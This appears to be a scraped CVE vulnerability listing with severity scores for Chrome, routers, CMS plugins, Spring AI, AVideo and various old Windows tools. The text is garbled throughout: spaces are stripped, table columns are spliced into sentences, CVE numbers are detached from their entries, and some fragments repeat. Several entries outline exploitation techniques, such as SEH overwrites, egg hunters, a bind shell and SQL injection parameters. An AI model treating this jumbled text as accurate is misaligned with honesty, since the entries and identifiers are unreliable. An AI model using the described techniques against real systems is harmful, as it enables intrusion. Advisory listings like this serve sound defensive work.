Details29056role=app-adminintheregistrationformtocreateanadministratoraccount.Version1.2.51fixestheissue. AvulnerabilitywasdeterminedinTendaA18Pro02.03.02.28.Theimpactedelementisthefunctionsub423B50CVE-ofthefile/goform/setMacFilterCfgofthecomponentMACFilteringConfigurationEndpoint.Executinga More2026- 8.8manipulationoftheargumentdeviceListcanleadtostack-basedbufferoverflow.Theattackmaybeperformed Details4493fromremote.Theexploithasbeenpubliclydisclosedandmaybeutilized. 
CVE-AvulnerabilitywasidentifiedinUTTHiPER1250GWupto3.2.7-210907-180535.Affectedisthefunctionstrcpyof More2026-thefile/goform/setSysAdm.SuchmanipulationoftheargumentGroupNameleadstobufferoverflow.Itispossible 8.8 Details4488tolaunchtheattackremotely.Theexploitispubliclyavailableandmightbeused. CVE- UseafterfreeinBaseinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More 8.8heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details

CVE- HeapbufferoverflowinCSSinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More CVE- HeapbufferoverflowinCSSinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More 8.8 Details CVE- HeapbufferoverflowinWebAudioinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More 8.8 executearbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4443 CVE- DedeCMSv5.7.118wasdiscoveredtocontainaCross-SiteRequestForgery(CSRF)vulnerabilityin More2026- 8.8 /systaskadd.php. Details29839 CVE- UseafterfreeinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4446 CVE- StackbufferoverflowinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 potentiallyexploitstackcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4444

CVE- Priortoversions7.15.1and8.9.3,anLDAPInjectionvulnerabilityexistsintheSuiteCRMauthenticationflow.The More2026- applicationfailstoproperlysanitizeuser-suppliedinputbeforeembeddingitintotheLDAPsearchfilter.By 8.8 Details33289 injectingLDAPcontrolcharacters,anunauthenticatedattackercanmanipulatethequerylogic,whichcanleadto authenticationbypassorinformationdisclosure.Versions7.15.1and8.9.3patchtheissue.

Priortoversions7.15.1and8.9.3,aSQLInjectionvulnerabilityexistsintheSuiteCRMauthenticationmechanismsCVE-whendirectorysupportisenabled.Theapplicationfailstoproperlysanitizetheuser-suppliedusernamebefore More2026- 8.8usingitinalocaldatabasequery.Anattackerwithvalid,low-privilegedirectorycredentialscanexploitthisto Details33288executearbitrarySQLcommands,leadingtocompleteprivilegeescalation(e.g.,logginginastheCRM Administrator).Versions7.15.1and8.9.3patchtheissue. Frigateisanetworkvideorecorder(NVR)withrealtimelocalobjectdetectionforIPcameras.Versionspriorto 0.17.0-beta1allowanyauthenticatedusertochangetheirownpasswordwithoutverifyingthecurrentpassword throughthe/users/{username}/passwordendpoint.ChangingapassworddoesnotinvalidateexistingJWTtokens,CVE-andthereisnovalidationofpasswordstrength.Ifanattackerobtainsavalidsessiontoken(e.g.,viaaccidentally More2026- 8.8exposedJWT,stolencookie,XSS,compromiseddevice,orsniffingoverHTTP),theycanchangethevictim’s Details33124passwordandgainpermanentcontroloftheaccount.SincepasswordchangesdonotinvalidateexistingJWT tokens,sessionhijackspersistevenafterapasswordreset.Additionally,thelackofpasswordstrengthvalidation exposesaccountstobrute-forceattacks.Thisissuehasbeenresolvedinversion0.17.0-beta1. 
CVE-OutofboundsreadandwriteinWebGLinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8performarbitraryread/writeviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details4440 CVE-UseafterfreeinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4445 Intakeisapackageforfinding,investigating,loadinganddisseminatingdata.Priortoversion2.0.9,theshell() CVE-syntaxwithinparameterdefaultvaluesappearstobeautomaticallyexpandedduringthecatalogparsingprocess. More2026-Ifacatalogcontainsaparameterdefaultsuchasshell(),thecommandmaybeexecutedwhenthe 8.8 Details33310catalogsourceisaccessed.ThismeansthatifauserloadsamaliciouscatalogYAML,embeddedcommandscould executeonthehostsystem.Version2.0.9mitigatestheissuebymakinggetshellFalsebydefaulteverywhere. Admidioisanopen-sourceusermanagementsolution.Versions5.0.6andbelowcontainacriticalunrestrictedfile uploadvulnerabilityintheDocuments&Filesmodule.DuetoadesignflawinhowCSRFtokenvalidationandfileCVE-extensionverificationinteractwithinUploadHandlerFile.php,anauthenticateduserwithuploadpermissionscan More2026- 8.8bypassfileextensionrestrictionsbyintentionallysubmittinganinvalidCSRFtoken.Thisallowstheuploadof Details32756arbitraryfiletypes,includingPHPscripts,whichmayleadtoRemoteCodeExecutionontheserver,resultinginfull servercompromise,dataexfiltration,andlateralmovement.Thisissuehasbeenfixedinversion5.0.7. 
PrecurioIntranetPortal4.4containsacross-siterequestforgeryvulnerabilitythatallowsattackerstoinduceCVE-authenticateduserstosubmitcraftedrequeststoaprofileupdateendpointhandlingfileuploads.Attackerscan More2026- 8.8exploitthistouploadexecutablefilestoweb-accessiblelocations,leadingtoarbitrarycodeexecutioninthe Details32989contextofthewebserver. TheLinksySearchandReplacepluginforWordPressisvulnerabletounauthorizedmodificationofdataduetoa CVE-missingcapabilitycheckonthe'linksysearchandreplaceitemdetails'functioninallversionsupto,and More2026-including,1.0.4.Thismakesitpossibleforauthenticatedattackers,withsubscriber-levelaccessandabove,to 8.8 Details2941updateanydatabasetable,anyvalue,includingthewpcapabilitiesdatabasefield,whichallowsattackersto changetheirownroletoadministrator,whichleadstoprivilegeescalation. CVE- 8.8HeapbufferoverflowinANGLEinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More Details exploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details LDAPAccountManager(LAM)isawebfrontendformanagingentries(e.g.users,groups,DHCPsettings)storedin anLDAPdirectory.Priortoversion9.5,alocalfileinclusionwasdetectedinthePDFexportthatallowsuserstoCVE-includelocalPHPfilesandthiswayexecutecode.IncombinationwithGHSA-88hf-2cjm-m9g8thisallowsto More 8.8executearbitrarycode.UsersneedtologintoLAMtoexploitthisvulnerability.Version9.5fixestheissue. Details27894Althoughupgradingisrecommended,aworkaroundwouldbetomake/var/lib/ldap-account-manager/configread- onlyfortheweb-serveruseranddeletethePDFprofilefiles(makingPDFexportsimpossible). CVE- More2026-PrivilegeescalationintheIPCcomponent.ThisvulnerabilityaffectsFirefox<149andThunderbird<149. 
8.8 Details4722 CVE-AcriticalSQLinjectionvulnerabilityinSpringAI'sMariaDBFilterExpressionConverterallowsattackerstobypass More2026-metadata-basedaccesscontrolsandexecutearbitrarySQLcommands.Thevulnerabilityexistsduetomissing 8.8 Details22730inputsanitization. Roxy-WIisawebinterfaceformanagingHaproxy,Nginx,ApacheandKeepalivedservers.Priortoversion8.2.6.3, CVE-acommandinjectionvulnerabilityexistsinthe/config/compare/ / /showendpoint,allowed More2026-authenticateduserstoexecutearbitrarysystemcommandsontheapphost.Thevulnerabilityexistsin 8.8 Details27811app/modules/config/config.pyonline362,whereuserinputisdirectlyformattedinthetemplatestringthatis eventuallyexecuted.Version8.2.6.3fixestheissue. CVE-TheTerrapacksoftware,fromASTERTEC/ASTERS.p.A.,withtheindicatedcomponentsandversionshasafile More2025-uploadvulnerabilitythatmayallowattackerstoexecutearbitrarycode.VulnerablecomponentsincludeTerrapack 8.8 Details67260TkWebCoreNG::1.0.20200914,TerrapackTKServerCGI2.5.4.150,andTerrapackTpkWebGISClient1.0.0.

CVE- to8.0.0.2,astoredcross-sitescripting(XSS)vulnerabilityinthepatientportalpaymentflowallowsapatient More2026- portalusertopersistarbitraryJavaScriptthatexecutesinthebrowserofastaffmemberwhoreviewsthe 8.7 Details33346 paymentsubmission.Thepayloadisstoredviaportal/lib/paylib.phpandrenderedwithoutescapingin portal/portal_payment.php.Version8.0.0.2fixestheissue. Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoMissingCryptographicStepviatheCVE- KJUR.crypto.DSA.signWithMessageHashprocessintheDSAsigningimplementation.Anattackercanrecoverthe More2026- 8.7 privatekeybyforcingrorstobezero,sothelibraryemitsaninvalidsignaturewithoutretrying,andthensolves Details4601 forxfromtheresultingsignature. Budibaseisalowcodeplatformforcreatinginternaltools,workflows,andadminpanels.Inversionsfrom3.30.6 andprior,theRESTdatasourcequerypreviewendpoint(POST/api/queries/preview)makesserver-sideHTTP CVE- requeststoanyURLsuppliedbytheuserinfields.pathwithnovalidation.Anauthenticatedadmincanreach More2026- internalservicesthatarenotexposedtotheinternet—includingcloudmetadataendpoints(AWS/GCP/Azure), 8.7 Details33226 internaldatabases,KubernetesAPIs,andotherpodsontheinternalnetwork.OnGCPthisleadstoOAuth2token theftwithcloud-platformscope(fullGCPaccess).Onanydeploymentitenablesfullinternalnetworkenumeration. Attimeofpublication,therearenopubliclyavailablepatches. StatamicisaLaravelandGitpoweredcontentmanagementsystem(CMS).Priortoversions5.73.14and6.7.0,aCVE- storedXSSvulnerabilityinSVGassetreuploadsallowsauthenticateduserswithassetuploadpermissionsto More2026- 8.7 bypassSVGsanitizationandinjectmaliciousJavaScriptthatexecuteswhentheassetisviewed.Thishasbeen Details33172 fixedin5.73.14and6.7.0. 
CVE- Connect-CMSisacontentmanagementsystem.Inversions1.35.0through1.41.0and2.35.0through2.41.0,a More2026- DOM-basedCross-SiteScripting(XSS)issueexistsintheCabinetPluginlistview.Versions1.41.1and2.41.1 8.7 Details32277 ImproperRestrictionofXMLExternalEntityReferencevulnerabilityinXMLUtils.javainSlovensko.DigitalAutogram CVE- allowsremoteunauthenticatedattackertoconductSSRF(ServerSideRequestForgery)attacksandobtain More2026- unauthorizedaccesstolocalfilesonfilesystemsrunningthevulnerableapplication.Successfulexploitation 8.6 Details3511 requiresthevictimtovisitaspeciallycraftedwebsitethatsendsrequestcontainingaspeciallycraftedXML documentto/signendpointofthelocalHTTPserverrunbytheapplication. OpenNeuralNetworkExchange(ONNX)isanopenstandardformachinelearninginteroperability.Inversionsup toandincluding1.20.1,asecuritycontrolbypassexistsinonnx.hub.load()duetoimproperlogicintherepository trustverificationmechanism.Whilethefunctionisdesignedtowarnuserswhenloadingmodelsfromnon-officialCVE- sources,theuseofthesilent=Trueparametercompletelysuppressesallsecuritywarningsandconfirmation More2026- 8.6 prompts.Thisvulnerabilitytransformsastandardmodel-loadingfunctionintoavectorforZero-InteractionSupply- Details28500 ChainAttacks.Whenchainedwithfile-systemvulnerabilities,anattackercansilentlyexfiltratesensitivefiles(SSH keys,cloudcredentials)fromthevictim'smachinethemomentthemodelisloaded.Asoftimeofpublication,no knownpatchedversionsareavailable. CVE- ExposureofsensitiveinformationtoanunauthorizedactorinAzureDataFactoryallowsanunauthorizedattacker More 8.6 todiscloseinformationoveranetwork. Details23659

Allure2istheversion2.xbranchofAllureReport,amulti-languagetestreportingtool.TheAllurereportgenerator

CVE- priortoversion2.38.0isvulnerabletoanarbitraryfilereadviapathtraversalwhenprocessingtestresults.An More attackercancraftamaliciousresultfile(-result.json,-container.json,or.plist)thatpointsanattachmentsourceto 8.6 Details33166 asensitivefileonthehostsystem.Duringreportgeneration,Allurewillresolvethesepathsandincludethe sensitivefilesinthefinalreport.Version2.38.0fixestheissue. Kanisanopen-sourceprojectmanagementtool.Inversions0.5.4andbelow,the/api/download/attatchment endpointhasnoauthenticationandnoURLvalidation.TheAttachmentDownloadendpointacceptsauser-CVE- suppliedURLqueryparameterandpassesitdirectlytofetch()server-side,andreturnsthefullresponsebody.An More2026- 8.6 unauthenticatedattackercanusethistomakeHTTPrequestsfromtheservertointernalservices,cloudmetadata Details32255 endpoints,orprivatenetworkresources.Thisissuehasbeenfixedinversion0.5.5.Toworkaroundthisissue, blockorrestrictaccessto/api/download/attatchmentatthereverseproxylevel(nginx,Cloudflare,etc.). 
Free5GCisanopen-sourceLinuxFoundationprojectfor5thgeneration(5G)mobilecorenetworks.Versionsprior to1.4.2arevulnerabletonullbyteinjectioninURLpathparameters.Aremoteattackercaninjectnullbytes(URL- encodedas%00)intothesupipathparameteroftheUDM'sNudmSubscriberDataManagementAPI.ThiscausesCVE- URLparsingfailureinGo'snet/urlpackagewiththeerror"invalidcontrolcharacterinURL",resultingina500 More2026- 8.6 InternalServerError.Thisnullbyteinjectionvulnerabilitycanbeexploitedfordenialofserviceattacks.Whenthe Details33191 supiparametercontainsnullcharacters,theUDMattemptstoconstructaURLforUDRthatincludesthesecontrol characters.Go'sURLparserrejectsthem,causingtherequesttofailwith500insteadofproperlyvalidatinginput andreturning400BadRequest.Thisissuehasbeenfixedinversion1.4.2. CVE- Server-siderequestforgery(ssrf)inMicrosoftPurviewallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details26138 CVE- Server-siderequestforgery(ssrf)inMicrosoftPurviewallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details26139 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theisSSRFSafeURL() CVE- functioninAVideocanbebypassedusingIPv4-mappedIPv6addresses(::ffff:x.x.x.x).Theunauthenticated More2026- plugin/LiveLinks/proxy.phpendpointusesthisfunctiontovalidateURLsbeforefetchingthemwithcurl,butthe 8.6 Details33480 IPv4-mappedIPv6prefixpassesallchecks,allowinganattackertoaccesscloudmetadataservices,internal networks,andlocalhostservices.Commit75ce8a579a58c9d4c7aafe453fbced002cb8f373containsapatch. 
WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,anunauthenticatedAPI endpoint(APIName=locale)concatenatesuserinputintoanincludepathwithnocanonicalizationorwhitelist.CVE- Pathtraversalisaccepted,soarbitraryPHPfilesunderthewebrootcanbeincluded.Inourtestthisyielded More2026- 8.6 confirmedfiledisclosureandcodeexecutionofexistingPHPcontent(e.g.,view/about.php),anditcan Details33513 escalatetoRCEifanattackercanplaceorcontrolaPHPfileelsewhereinthetree.Asoftimeofpublication,no patchedversionsareavailable. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theCDNpluginendpoints plugin/CDN/status.json.phpandplugin/CDN/disable.json.phpusekey-basedauthenticationwithanemptyCVE- stringdefaultkey.WhentheCDNpluginisenabledbutthekeyhasnotbeenconfigured(thedefaultstate),the More2026- 8.6 keyvalidationcheckiscompletelybypassed,allowinganyunauthenticatedattackertomodifythefullCDN Details33719 configuration—includingCDNURLs,storagecredentials,andtheauthenticationkeyitself—viamass-assignment throughtheparrequestparameter.Commitadeff0a31ba04a56f411eef256139fd7ed7d4310containsapatch. WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,theplugin/LiveLinks/proxy.php CVE- endpointvalidatesuser-suppliedURLsagainstinternal/privatenetworksusingisSSRFSafeURL(),butonlychecks More2026- theinitialURL.WhentheinitialURLrespondswithanHTTPredirect(Locationheader),theredirecttargetis 8.6 Details33039 fetchedviafakeBrowser()withoutre-validation,allowinganattackertoreachinternalservices(cloudmetadata, RFC1918addresses)throughanattacker-controlledredirect.Thisissueisfixedinversion26.0. CVE- InsufficientlyprotectedcredentialsinAzureDevOpsallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. 
Details23658 VulnerabilityinSpringCloudwhensubstitutingtheprofileparameterfromarequestmadetotheSpringCloudCVE- ConfigServerconfiguredtothenativefilesystemasabackend,becauseitwaspossibletoaccessfilesoutsideof More2026- 8.6 theconfiguredsearchdirectories.ThisissueaffectsSpringCloud:from3.1.Xbefore3.1.13,from4.1.Xbefore Details22739 4.1.9,from4.2.Xbefore4.2.3,from4.3.Xbefore4.3.2,from5.0.Xbefore5.0.2. LuCIistheOpenWrtConfigurationInterface.Versionspriortoboth24.10.5and25.12.0,containastoredXSS vulnerabilityinthewirelessscanmodal,whereSSIDvaluesfromscanresultsarerenderedasrawHTMLwithout anysanitization.Thewireless.jsfileintheluci-mod-networkpackagepassesSSIDsviaatemplateliteralto CVE- dom.append(),whichprocessesthemthroughinnerHTML,allowinganattackertocraftamaliciousSSID More2026- 8.6 containingarbitraryHTML/JavaScript.Exploitationrequirestheusertoactivelyopenthewirelessscanmodal(e.g., Details32721 toconnecttoaWi-Fiaccesspointorsurveynearbychannels),andonlyaffectsOpenWrtversionsnewerthan 23.05/22.03uptothepatchedreleases(24.10.6and25.12.1).TheissuehasbeenfixedinversionLuCI 26.072.65753~068150b. CVE- Sandboxescapeduetoincorrectboundaryconditions,integeroverflowintheXPCOMcomponent.This More vulnerabilityaffectsFirefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,and 8.6 vulnerabilityaffectsFirefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,and 8.6 Details Thunderbird<140.9. 
AJSONPathinjectionvulnerabilityinSpringAI'sAbstractFilterExpressionConverterallowsauthenticatedusersto bypassmetadata-basedaccesscontrolsthroughcraftedfilterexpressions.User-controlledinputpassedto FilterExpressionBuilderisconcatenatedintoJSONPathquerieswithoutproperescaping,enablingattackerstoCVE- injectarbitraryJSONPathlogicandaccessunauthorizeddocuments.Thisvulnerabilityaffectsapplicationsusing More2026- 8.6 vectorstoresthatextendAbstractFilterExpressionConverterformulti-tenantisolation,role-basedaccesscontrol, Details22729 ordocumentfilteringbasedonmetadata.Thevulnerabilityoccurswhenuser-suppliedvaluesinfilterexpressions arenotescapedbeforebeinginsertedintoJSONPathqueries.Specialcharacterslike",||,and&&arepassed throughunescaped,allowinginjectionofarbitraryJSONPathlogicthatcanaltertheintendedquerysemantics. CVE- SandboxescapeduetoincorrectboundaryconditionsintheTelemetrycomponent.Thisvulnerabilityaffects More2026- 8.6 Firefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4687 MariaDBserverisacommunitydevelopedforkofMySQLserver.AnauthenticatedusercancrashMariaDB CVE- versions11.4before11.4.10and11.8before11.8.6viaabuginJSONSCHEMAVALID()function.Undercertain More2026- conditionsitmightbepossibletoturnthecrashintoaremotecodeexecution.Theseconditionsrequiretight 8.5 Details32710 controlovermemorylayoutwhichisgenerallyonlyattainableinalabenvironment.ThisissueisfixedinMariaDB 11.4.10,MariaDB11.8.6,andMariaDB12.2.2. 
IperiusBackup6.1.0containsaprivilegeescalationvulnerabilitythatallowslow-privilegeuserstoexecute CVE- arbitraryprogramswithelevatedprivilegesbycreatingbackupjobs.Attackerscanconfigurebackupjobsto More2019- executemaliciousbatchfilesorprogramsbeforeorafterbackupoperations,whichrunwiththeprivilegesofthe 8.4 Details25608 IperiusBackupServiceaccount(LocalSystemorAdministrator),enablingprivilegeescalationandarbitrarycode execution. FlexHEX2.71containsalocalbufferoverflowvulnerabilityintheStreamNamefieldthatallowslocalattackerstoCVE- executearbitrarycodebytriggeringastructuredexceptionhandler(SEH)overflow.Attackerscancrafta More2019- 8.4 malicioustextfilewithcarefullyalignedshellcodeandSEHchainpointers,pastethecontentsintotheStream Details25627 Namedialog,andexecutearbitrarycommandslikecalc.exewhentheexceptionhandleristriggered. LavavoCDRipper4.20containsastructuredexceptionhandling(SEH)bufferoverflowvulnerabilitythatallowsCVE- localattackerstoexecutearbitrarycodebysupplyingamaliciousstringintheLicenseActivationNamefield. More2019- 8.4 Attackerscancraftapayloadwithcontrolledbufferdata,NSEHjumpinstructions,andSEHhandleraddressesto Details25615 triggercodeexecutionandestablishabindshellonport3110. Base64Decoder1.1.2containsastack-basedbufferoverflowvulnerabilitythatallowslocalattackerstoexecuteCVE- arbitrarycodebytriggeringastructuredexceptionhandler(SEH)overwrite.Attackerscancraftamaliciousinput More2019- 8.4 filethatoverflowsabuffer,overwritestheSEHchainwithaPOP-POP-RETgadgetaddress,andusesanegghunter Details25634 payloadtolocateandexecuteshellcodeforcodeexecution. 
AIDA64Extreme5.99.4900containsastructuredexceptionhandlingbufferoverflowvulnerabilitythatallowslocalCVE- attackerstoexecutearbitrarycodebysupplyingmaliciousinputthroughtheemailpreferencesandreportwizard More2019- 8.4 interfaces.AttackerscaninjectcraftedpayloadsintotheDisplaynamefieldandLoadfromfileparameterto Details25633 triggertheoverflowandexecuteshellcodewithapplicationprivileges. CVE- Axessh4.2containsastack-basedbufferoverflowvulnerabilityinthelogfilenamefieldthatallowslocalattackers More2019- toexecutearbitrarycodebysupplyinganexcessivelylongfilename.Attackerscanoverflowthebufferatoffset 8.4 Details25607 214bytestooverwritetheinstructionpointerandexecuteshellcodewithsystemprivileges. AIDA64Business5.99.4900containsastructuredexceptionhandlingbufferoverflowvulnerabilitythatallowslocalCVE- attackerstoexecutearbitrarycodebyoverwritingSEHpointerswithmaliciousshellcode.Attackerscaninjectegg More2019- 8.4 huntershellcodethroughtheSMTPdisplaynamefieldinpreferencesorreportwizardfunctionalitytotriggerthe Details25631 overflowandexecutecodewithapplicationprivileges. AIDA64Extreme5.99.4900containsastructuredexceptionhandlerbufferoverflowvulnerabilityintheloggingCVE- functionalitythatallowslocalattackerstoexecutearbitrarycodebysupplyingamaliciousCSVlogfilepath. More2019- 8.4 AttackerscaninjectshellcodethroughtheHardwareMonitoringloggingpreferencestooverflowthebufferand Details25629 triggercodeexecutionwhentheapplicationprocessesthelogfilepath. 
X-NetStatPro5.63containsalocalbufferoverflowvulnerabilitythatallowslocalattackerstoexecutearbitraryCVE- codebyoverwritingtheEIPregisterthrougha264-bytebufferoverflow.Attackerscaninjectshellcodeinto More2019- 8.4 memoryanduseanegghuntertechniquetolocateandexecutethepayloadwhentheapplicationprocesses Details25637 maliciousinputthroughHTTPClientorRulesfunctionality. TuneClone2.20containsastructuredexceptionhandler(SEH)bufferoverflowvulnerabilitythatallowslocal CVE- attackerstoexecutearbitrarycodebysupplyingamaliciouslicensecodestring.Attackerscancraftapayload More2019- 8.4 withacontrolledbuffer,NSEHjumpinstruction,andSEHhandleraddresspointingtoaROPgadget,thenpasteit Details25603 intothelicensecodefieldtotriggercodeexecutionandestablishabindshell. FTPShellServer6.83containsabufferoverflowvulnerabilityinthe'Accountnametoban'fieldthatallowslocalCVE- attackerstoexecutearbitrarycodebysupplyingacraftedstring.Attackerscaninjectshellcodethroughthe More accountnameparameterintheManageFTPAccountsdialogtooverwritethereturnaddressandexecutecalc.exe Details 8.4 orothercommands.25619 orothercommands.25619 RiverPastCamDo3.7.6containsalocalbufferoverflowvulnerabilityintheactivationcodeinputfieldthatallowsCVE- localattackerstoexecutearbitrarycodebysupplyingamaliciousactivationcodestring.Attackerscancrafta More 8.4 buffercontaining608bytesofjunkdatafollowedbyshellcodeandSEHchainoverwritevaluestotriggercode Details25626 executionwhentheactivationdialogprocessestheinput. 
DVDXPlayerPro5.5containsalocalbufferoverflowvulnerabilitywithstructuredexceptionhandlingthatallowsCVE- localattackerstoexecutearbitrarycodebycraftingmaliciousplaylistfiles.Attackerscancreateaspecially More2019- 8.4 crafted.plffilecontainingshellcodeandNOPsledsthatoverflowsabufferandhijackstheSEHchaintoexecute Details25604 arbitrarycodewithapplicationprivileges. cgltfversion1.15andpriorcontainanintegeroverflowvulnerabilityinthecgltfvalidate()functionwhen CVE- validatingsparseaccessorsthatallowsattackerstotriggerout-of-boundsreadsbysupplyingcraftedglTF/GLB More2026- inputfileswithattacker-controlledsizevalues.Attackerscanexploituncheckedarithmeticoperationsinsparse 8.4 Details32845 accessorvalidationtocauseheapbufferover-readsincgltfcalcindexbound(),resultingindenialofservice crashesandpotentialmemorydisclosure. JetAudiojetCastServer2.0containsastack-basedbufferoverflowvulnerabilityintheLogDirectoryconfigurationCVE- fieldthatallowslocalattackerstooverwritestructuredexceptionhandlingpointers.Attackerscaninject More2019- 8.4 alphanumericencodedshellcodethroughtheLogDirectoryfieldtotriggeranSEHexceptionhandlerandexecute Details25609 arbitrarycodewithapplicationprivileges. MiniFtpcontainsabufferoverflowvulnerabilityintheparseconfloadsettingfunctionthatallowslocalattackersCVE- toexecutearbitrarycodebysupplyingoversizedconfigurationvalues.Attackerscancraftaminiftpd.conffilewith More2019- 8.4 valuesexceeding128bytestooverflowstackbuffersandoverwritethereturnaddress,enablingcodeexecution Details25611 withrootprivileges. CVE- ImpropercertificatevalidationinDevolutionsHubReportingService2025.3.1.1andearlierallowsanetwork More2026- 8.3 attackertoperformaman-in-the-middleattackviadisabledTLScertificateverification. 
CVE-2026-1313 (CVSSv3 8.3): The Mime Types Link Icons plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.2.20. This is due to the plugin making outbound HTTP requests to user-controlled URLs without proper validation when the "Show file size" option is enabled. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services via crafted links in post content.

CVE-2026-32278 (CVSSv3 8.2): … versions on the 2.x series up to and including 2.41.0, a Stored Cross-site Scripting (XSS) issue exists in the file field of the Form Plugin. Versions 1.41.1 and 2.41.1 contain a patch.

CVE-2019-25643 (CVSSv3 8.2): eNdonesia Portal v8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the bid parameter. Attackers can send GET requests to banners.php with crafted SQL payloads in the bid parameter to extract sensitive database information from the INFORMATION_SCHEMA tables.

CVE-2026-33331 (CVSSv3 8.2): oRPC is a tool that helps build APIs that are end-to-end type-safe and adhere to OpenAPI standards. Prior to version 1.13.9, a stored cross-site scripting (XSS) vulnerability exists in the OpenAPI documentation generation of orpc. If an attacker can control any field within the OpenAPI specification (such as info.description), they can break out of the JSON context and execute arbitrary JavaScript when a user views the generated API documentation. This issue has been patched in version 1.13.9.
ZeewaysMatrimonyCMScontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoCVE- manipulatedatabasequeriesthroughtheprofilelistendpoint.AttackerscaninjectSQLcodeviatheupcast, More2019- 8.2 smother,andsreligionparameterstoextractsensitivedatabaseinformationusingtime-basedorerror-based Details25635 techniques. phpTransformer2016.9containsanSQLinjectionvulnerabilitythatallowsremoteattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheidnewsparameter.AttackerscansendcraftedGETrequests More2019- 8.2 toGeneratePDF.phpwithSQLpayloadsintheidnewsparametertoextractsensitivedatabaseinformationor Details25578 manipulatequeries. SpringBootapplicationswithActuatorcanbevulnerabletoan"AuthenticationBypass"vulnerabilitywhenanCVE- applicationendpointthatrequiresauthenticationisdeclaredunderthepathusedbytheCloudFoundryActuator More2026- 8.2 endpoints.ThisissueaffectsSpringSecurity:from4.0.0through4.0.3,from3.5.0through3.5.11,from3.4.0 Details22733 through3.4.14,from3.3.0through3.3.17,from2.7.0through2.7.31. Kyselyisatype-safeTypeScriptSQLquerybuilder.Versionsuptoandincluding0.28.11hasaSQLinjection vulnerabilityinJSONpathcompilationforMySQLandSQLitedialects.ThevisitJSONPathLeg()functionappends user-controlledvaluesfrom.key()and.at()directlyintosingle-quotedJSONpathstringliterals('$.key')CVE- More withoutescapingsinglequotes.AnattackercanbreakoutoftheJSONpathstringcontextandinjectarbitrarySQL. 8.2 Details ThisisinconsistentwithsanitizeIdentifier(),whichproperlydoublesdelimitercharactersforidentifiers—both32763 arenon-parameterizableSQLconstructsrequiringmanualescaping,butonlyidentifiersareprotected.Version 0.28.12fixestheissue. 0.28.12fixestheissue. 
KeplerWallpaperScript1.1containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoCVE- executearbitrarySQLqueriesbyinjectingmaliciouscodeintothecategoryparameter.AttackerscansendGET More 8.2 requeststothecategoryendpointwithURL-encodedSQLUNIONstatementstoextractdatabaseinformation Details25576 includingusernames,databasenames,andMySQLversiondetails. ZeewaysJobsiteCMScontainsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstomanipulateCVE- databasequeriesbyinjectingSQLcodethroughthe'id'GETparameter.Attackerscansendcraftedrequeststo More2019- 8.2 newsdetails.php,jobsdetails.php,orjobcmpdetails.phpwithmalicious'id'valuesusingGROUPBYandCASE Details25636 statementstoextractsensitivedatabaseinformation. ownDMS4.7containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheIMGparameter.AttackerscansendGETrequeststo More2019- 8.2 pdfstream.php,imagestream.php,oranyfilestream.phpwithcraftedSQLpayloadsintheIMGparametertoextract Details25580 sensitivedatabaseinformationincludingversionanddatabasenames. SimplePressCMS1.0.7containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecuteCVE- arbitrarySQLqueriesbyinjectingmaliciouscodethroughthe'p'and's'parameters.AttackerscansendGET More2019- 8.2 requestswithcraftedSQLpayloadstoextractsensitivedatabaseinformationincludingusernames,database Details25575 names,andversiondetails. 
TheKiviCare–Clinic&PatientManagementSystem(EHR)pluginforWordPressisvulnerabletoPrivilegeCVE- Escalationduetomissingauthorizationonthe/wp-json/kivicare/v1/setup-wizard/clinicRESTAPIendpointinall More2026- 8.2 versionsupto,andincluding,4.1.2.Thismakesitpossibleforunauthenticatedattackerstocreateanewclinic Details2992 andaWordPressuserwithclinicadminprivileges. HeimdallisacloudnativeIdentityAwareProxyandAccessControlDecisionservice.WhenusingHeimdallin envoygRPCdecisionAPImodewithversions0.7.0-alphathrough0.17.10,wrongencodingofthequeryURLstring allowsruleswithnon-wildcardpathexpressionstobebypassed.EnvoysplitstherequestedURLintoparts,and sendsthepartsindividuallytoHeimdall.AlthoughqueryandpatharepresentintheAPI,thequeryfieldis CVE- documentedtobealwaysemptyandtheURLqueryisincludedinthepathfield.Theimplementationusesgo'surl More2026- librarytoreconstructtheurlwhichautomaticallyencodesspecialcharactersinthepath.Asaconsequence,a 8.2 